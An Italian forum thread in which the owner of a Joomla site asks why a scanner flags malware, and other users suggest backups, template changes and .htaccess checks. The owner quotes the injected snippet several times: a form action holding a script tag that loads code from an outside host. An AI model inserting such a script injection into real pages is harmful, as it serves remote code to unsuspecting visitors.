malware?!?! ma chi ce l'ha messo???

[carorland]

ho un problema, il mio antivirus dice che nel mio sito c'è un malware, e qualche tempo fa anche google lo bloccava... che devo fare, il mio sito è www.gesuilnazareno.org


grazie a tutti

[X-mac]

Scarica i file del,sito e fai una scansione

[carlodamo]

Usa anche questo strumento: http://sitecheck.sucuri.net/

[carorland]

ecco il risultato, che devo fare:
PROBLEMA RILEVATODEFINIZIONEURL INFETTO
Sito web Malwaremwjs-iframe-injected691? V27http://www.gesuilnazareno.org ( Visualizza Payload )
Sito web Malwaremwjs-iframe-injected691? V27http://www.gesuilnazareno.org/dal-Nostro-cuore.html ( Visualizza Payload )
Sito web Malwaremwjs-iframe-injected691? V27http://www.gesuilnazareno.org/chi-siamo.html ( Visualizza Payload )
Sito web Malwaremwjs-iframe-injected691? V27http://www.gesuilnazareno.org/dicono-di-noi.html ( Visualizza Payload )
Sito web Malwaremwjs-iframe-injected691? V27http://www.gesuilnazareno.org/lettera.html ( Visualizza Payload )
Sito web Malwaremwjs-iframe-injected691? V27http://www.gesuilnazareno.org/casa-di-preghiera.html ( Visualizza Payload )

Conosciuto javascript malware. Dettagli: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v27 <Form class = "arte-ricerca" name = "Cerca" action = "<script type =" text / javascript "src =" http://ahmet.biz/cgi-bin/839vHXnY.php?id=3728753 "> </ script> /index.php/component/search / ">

[tomtomeight]

Ciao


Invece di chiederti chi ce l'ha messo, che anche se lo scopri non ti serve a nulla,  chiediti tu cosa hai fatto  per evitarlo, che politica di sicurezza hai adottato, hai tenuto il sito regolarmente aggiornato e ancora hai fatto regolari backup?

Adesso puoi risolvere appunto ripristinando un backup se l'hai, in caso contrario oltre che tentare un improbabile pulizia sarebbe il caso di rifare tutto daccapo.

[carorland]

la mia domanda è retorica... si, il sito è aggiornato, ho backup semestrali e invece di sparare a vanvera pregherei di darmi una soluzione valida. Non ci penso proprio di rifare tutto da capo, li c'è il lavoro di una vita di tante persone.


per cui chiedo consigli non giudizi d'altronde il paziente non è mica morto...
grazie. 


p.s. analizzando i miei backup non c'è nessun malware, ho fatto anche come mi ha detto x-mac, ho scaricato il sito e lo analizzato e il tutto risulta pulito ma attraverso l'analisi web mi da gli errori che ho postato...

[steganoga]

Codice: [Seleziona]

[quote]<Form class = "arte-ricerca" name = "Cerca" action = "<script type =" text / javascript "src =" http://ahmet.biz/cgi-bin/839vHXnY.php?id=3728753 "> </ script> /index.php/component/search / ">
guarda l'html della tua pagina.

joomla l'avrai aggiornato ma da qualche estensione sono passati

[X-mac]

il malware che hai sembra che sia qualcosa che linka all'esterno quindi è un po' complicato da vedere.
Se riesci cerca di risalare almeno alle pagine "infette"

[steganoga]

Se riesci cerca di risalare almeno alle pagine "infette"

... guarda che joomla non ha pagine...

e nessun antivirus ti evidenzia un link come malware, il tool di sucuri lo fa perchè il suo "algoritmo" gli dice che uno script in quel punto non può che essere una somma asinata o un iniezione

[tomtomeight]

Non era sparare a vanvera ma se vuoi credilo pure, intanto se dici di avere un backup allora stai tranquillo che il morto resuscita.

[X-mac]

... guarda che joomla non ha pagine...

e nessun antivirus ti evidenzia un link come malware, il tool di sucuri lo fa perchè il suo "algoritmo" gli dice che uno script in quel punto non può che essere una somma asinata o un iniezione

questo lo so, l'idea è quella di lavorare in locale e cercare di fare debug attraverso tools di sviluppo. Magari usando Eclipse qualcosa salta fuori.

[steganoga]

visto che intorno c'è un link prova per sicurezza a guardare nell'htaccess se lo usi
altrimenti prova a cambiare template e guarda se sparisce

[tomtomeight]

Visto che per lo più sono articoli dovrebbe guardare nel db e lì eliminare il codice iniettato, tuttavia anche eliminandoli non sarà poi sicuro da dove sono entrati e certamente l'infezione si ripeterà,  ergo il mio suggerimento di rifare daccapo magari recuperando i contenuti dal db dopo eventuale puluzia.

[carorland]

ammettiamo che io abbia trovato il codice melevole, come lo tolgo???

[X-mac]

lo cancelli e basta, modifichi la routine o il punto di ingresso in modo che non possa più accedere almeno da li

[carorland]

scusa, mi sono espresso male, dove vado per toglierlo

[X-mac]

Visto che per lo più sono articoli dovrebbe guardare nel db e lì eliminare il codice iniettato, tuttavia anche eliminandoli non sarà poi sicuro da dove sono entrati e certamente l'infezione si ripeterà,  ergo il mio suggerimento di rifare daccapo magari recuperando i contenuti dal db dopo eventuale puluzia.

una via potrebbe essere questa,
però dipende da cosa hai trovato

[carorland]

posso toglierlo andando nell'html della prima pagina???

[X-mac]

ma lo hai trovato

[steganoga]

ma non hai nessun amico che può dargli un occhiata?

"supponiamo" è un cattivo presagio al "cancello roba a caxo"

per trovarlo te l'ho già detto dove potrebbe stare, lascia perdere il database perchè nessun sqlinj può inserire nulla e anche se lo inserisse non succede nulla, basta che vai nel db in un articolo e guardi cosa succede ad incollarci uno script... nulla.

[carorland]

si questo  e il codice che mi viene rilevato malevole: <Form class = "arte-ricerca" name = "Cerca" action = "<script type =" text / javascript "src ="http://ahmet.biz/cgi-bin/839vHXnY.php?id=3728753 "> </ script> /index.php/component/search / ">

[X-mac]

ma quell'action chi l'ha fatta?
comunque se è quello devi semplicemente cambiare action
tipo action="tua action"